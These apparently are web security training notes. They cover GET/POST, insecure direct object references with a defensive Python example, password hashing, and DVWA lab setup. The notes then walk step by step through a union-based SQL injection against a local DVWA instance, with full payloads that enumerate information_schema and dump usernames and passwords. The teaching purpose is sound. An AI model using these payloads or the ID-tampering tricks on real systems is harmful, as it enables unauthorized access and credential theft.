SESSION 10
==========
METHODS USED IN WEB APPLICATIONS
================================
1. GET - Requests data from a specified resource. The parameters travel in the URL query string, so whatever the web application UI sends to the server or database is visible in the address bar, browser history, bookmarks, proxy and web server logs and the Referer header sent to other sites. That is why GET is called unsecure for anything sensitive.
eg. php?id=1, ?cat=54, ?test=query
2. POST - Sends the data to the server in the request body instead of the URL, so it does not show up in the address bar or in ordinary access logs. It is not secret: without HTTPS the body crosses the network in plain text, and a proxy or packet capture reads it as easily as a GET. eg. twitter.com/login.php
----------------------------------------------------------
INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory or database key, directly in a URL or form parameter. Without an access control check on every request, an attacker only has to change that reference to reach other users' records, files, configuration and settings pages that the administrator never authorized them to see. The check has to happen on the server for each request; hiding the link in the UI is not protection.
For eg. :
CHJM Website :
Accessing another user's account by changing the id parameter -
www.chjm.org/login/.../php?id=1411 (Alex)
www.chjm.org/login/../php?id=1411 (with the id value changed, the same page shows Logan's account)
Accessing pages which are not authorized to a basic user (forced browsing) -
www.chjm.org/user/../settings/config.html
www.chjm.org/login/../php?id=logan/settings/config.html
EG : arvindsharma.com > Login
arvindsharma.com/account/login.php
arvindsharma.com/account/user.php?id=1337
Breaking the URL down:
URL > arvindsharma.com
/account/ > folder
user.php > code (the script that looks up the record)
1337 > Sanjeev Multani (the database key of his account)
Kshitij logs in with his own id 1111, changes the id in the URL to 1337 and lands in Sanjeev's account, because user.php trusts the id in the URL instead of the logged-in session.
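The arvindsharma.com walkthrough above, as an added Python example (not code from the notes or from any site they mention): a handler that trusts the id in the URL beside one that checks the session, the admin-only settings page case, and the indirect reference map alternative. The names and ids are the notes' own; the records, the Session class and the function names are assumptions made for this example.

```python
"""Added example, not code from the notes or from any of the sites they mention:
the arvindsharma.com walkthrough as a request handler. The ids and names are the
notes' own; the records, the Session object and the helper names are
constructed for this example."""
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    """Who is asking. In a real app this comes from the session cookie,
    never from the URL."""
    user_id: int
    role: str = "user"


class Forbidden(Exception):
    """Raised when the caller is not allowed to see the requested object."""


# Constructed records keyed by the database id that user.php?id=N exposes.
USERS = {
    1111: {"name": "Kshitij", "email": "kshitij@example.com"},
    1337: {"name": "Sanjeev Multani", "email": "sanjeev@example.com"},
}


def user_page_vulnerable(session: Session, requested_id: int) -> dict:
    """user.php?id=N as the notes describe it: the id from the URL is used
    directly as the database key, so any logged-in user can read any row."""
    return USERS[requested_id]


def can_read(session: Session, requested_id: int) -> bool:
    """Authorization decision made from the session, not from the URL."""
    return session.role == "admin" or session.user_id == requested_id


def user_page_fixed(session: Session, requested_id: int) -> dict:
    """Same lookup with the missing access control check in front of it."""
    if not can_read(session, requested_id):
        raise Forbidden(f"user {session.user_id} may not read {requested_id}")
    return USERS[requested_id]


def settings_page(session: Session) -> str:
    """The /settings/config.html case: a page that exists on disk for
    everyone but must be served only to the admin role (forced browsing)."""
    if session.role != "admin":
        raise Forbidden("admin only")
    return "config.html contents"


def indirect_map(session: Session) -> dict:
    """Indirect reference map: hand the browser random per-session tokens
    instead of database keys, so the URL carries nothing an attacker can
    increment. Only the objects this session may see get a token."""
    allowed = list(USERS) if session.role == "admin" else [session.user_id]
    return {secrets.token_urlsafe(8): uid for uid in allowed}


def user_page_indirect(token_map: dict, token: str) -> dict:
    """Resolve the token; anything not in this session's map is forbidden."""
    uid = token_map.get(token)
    if uid is None:
        raise Forbidden("unknown reference")
    return USERS[uid]


if __name__ == "__main__":
    kshitij = Session(user_id=1111)
    print("vulnerable:", user_page_vulnerable(kshitij, 1337))  # Sanjeev's record
    try:
        user_page_fixed(kshitij, 1337)
    except Forbidden as err:
        print("fixed:", err)
```

The fix is the one-line check in user_page_fixed; the indirect map is the extra step for cases where even revealing that id 1337 exists is unwanted.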
----------------------------------------------------------
SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Sensitive data needs protection both in transit and at rest: if it is transmitted or stored in plain text instead of encrypted (or, for passwords, hashed), it is trivial for an attacker or any other individual who reaches the network, the database or a backup to read it.
Types of Sensitive Data
=======================
1. Personal - Names, addresses, contact numbers etc.
2. Confidential - IDs and passwords (credentials), Aadhaar number etc.
3. Financial - Bank account numbers, credit cards, debit cards etc.
4. Health Information - Medical records, insurance policies etc.
Demonstration on LVS.
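What "plain text" versus protected storage means for the credential and financial categories above, as an added Python example (not from the notes or LVS): passwords kept as a salted PBKDF2-HMAC-SHA256 hash from the standard library and checked in constant time, and card numbers masked to the last four digits before display. The record format, function names and sample values are constructed for this example.

```python
"""Added example, not from the notes: plain text versus protected storage for
credentials and card numbers. Uses only the Python standard library; the
stored-record format and the sample values are constructed."""
import base64
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000  # OWASP's 2023 figure for PBKDF2-HMAC-SHA256


def store_plaintext(password: str) -> str:
    """What sensitive data exposure looks like in the database: anyone who
    reads the row (SQLi, stolen backup, insider) has the password itself."""
    return password


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, deliberately slow hash. A fresh random salt per user means two
    users with the same password get different hashes and precomputed tables
    are useless; the iteration count makes each guess expensive."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in
    constant time so response timing does not leak how many bytes matched."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(digest, expected)


def mask_card(pan: str) -> str:
    """Financial data: never echo a full card number to a page or a log;
    keep only the last four digits for display."""
    digits = pan.replace(" ", "")
    return "*" * (len(digits) - 4) + digits[-4:]


if __name__ == "__main__":
    record = hash_password("Winter2024!")
    print("stored:", record)
    print("login ok:", verify_password("Winter2024!", record))
    print("wrong password:", verify_password("winter2024!", record))
    print("card:", mask_card("4111 1111 1111 1111"))
```

The stored string carries its own algorithm, iteration count and salt, so the cost can be raised later and old records re-hashed on next login without a schema change.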
----------------------------------------------------------
DVWA SETUP AND CONFIGURATION
============================
DVWA stands for Damn Vulnerable Web Application. It is a PHP/MySQL web application that is deliberately vulnerable, built for learning and practising the OWASP Top 10 in a lab, like LVS.
STEPS
=====
1. Copy the zip file into C:\xampp\htdocs
2. Right click the zip file and click "Extract Here"
3. Start the XAMPP control panel and start Apache and MySQL
4. Go to the dvwa directory in "htdocs", open the config folder and edit config.inc.php (copy it from config.inc.php.dist if only that file exists). Set the database password to "" (empty), which is XAMPP's default for the root account; if you keep XAMPP's default account, set the database user to root as well.
5. Open the browser and go to 127.0.0.1/dvwa
6. It will show the setup page with a message and button to create the database.
7. After clicking it, the dvwa database has been created; 127.0.0.1/phpmyadmin lists all the databases and you can see it there.
8. Go through the instruction page of LVS and then start learning through it.
----------------------------------------------------------
OWASP A1. INJECTIONS
=====================
UNION BASED SQL INJECTION
=========================
SQL injection is an attack in which the attacker types SQL syntax into an input of the web application UI (a URL parameter, form field, cookie or header) that the application concatenates into its query, so the attacker's text is executed by the database. UNION based SQLi is the variant where the injected UNION SELECT appends the attacker's own query result to the page's normal result, so the application itself displays the stolen data.
The attacker walks the hierarchy Database -> Tables -> Columns -> Rows with successive queries and ends up with the "juicy" data.
TERMINOLOGIES
=============
1. Information Schema : The built-in information_schema database of MySQL/MariaDB holds metadata about every database, table and column on the server. It is the starting point for enumeration, the "mother of information".
2. --+ : In MySQL, "-- " (two dashes followed by a space) starts a comment that runs to the end of the line. The + is URL-decoded to a space by the server, which is what makes the comment valid; everything after it, including the application's own closing quote, is ignored.
3. # : Everything entered after # is also a comment in MySQL and is not considered. In a URL, however, a bare # starts the fragment and is never sent to the server, so in a GET parameter it must be written as %23.
4. database() - returns the name of the current database.
5. version() - returns the version of the database server.
Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
Note: for SQLi the notes recommend Firefox, because its address bar shows special symbols and spaces in the URL without percent-encoding them, which makes payloads easier to read and edit (the browser still encodes them on the wire).
STEPS
======
Step 1: Find the GET method/parameter
eg. php?id=1
?cat=24
?test=query
Click every possible link and submit inputs into the search boxes and forms that use GET, and watch which parameters appear in the URL.
"http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#"
Step 2: Check whether the site is vulnerable to union based SQLi
?id=1'
php?id=1'
A database error means the quote broke the query, i.e. the input reaches the SQL unescaped and the parameter is injectable. (For union based extraction the query's output must also be displayed on the page; if it is not, the bug is still there but has to be exploited blind.)
It will give - "http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1"
Step 3: Find the number of columns in the vulnerable query (not in the database). A UNION only works when both SELECTs return the same number of columns, so this number is needed for step 4.
order by 1--+
order by 2--+
order by 3--+
Increase the number by one until you get the error "Unknown column 'N' in 'order clause'"; the last value that worked without an error is the column count.
Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Unknown column '3' in 'order clause'
So the query has 2 columns.
Step 4: Union select that many columns and see which of them are reflected on the page; those positions are where we can place our own expressions
union select 1,2--+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
Step 5: Extract information from the database by putting functions in the reflected positions
- database()
- version()
- union select version(),2--+
- union select 1,version()--+
- union select all 1,version()--+ : 10.1.25-MariaDB
- union select all 1,database()--+ : dvwa
Step 6: Call the mother of databases - information_schema
= Extracting table names (add "where table_schema=database()" to limit the list to the current database)
- union select all 1,table_name from information_schema.tables--+
http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
= After choosing a juicy table, extract its column names:
- column_name from information_schema.columns
- union select all 1,column_name from information_schema.columns where table_name="users"--+
= To get the data from the columns (user, password)
- union select user,password from users--+
- http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select group_concat(user,0x0a,password),2 from users--+&Submit=Submit#
(group_concat joins every row into one field, with 0x0a, a newline, as the separator, so all user/password pairs come back even when the page only prints one row.)
And we get the juicy data.
-------------------------------------------------------------------------------
TESTING WEBSITES
================
1. http://demo.testfire.net/
2. http://testphp.vulnweb.com/
TASKS
=====
1. What is the meaning of % in a URL?
2. What is a WAF?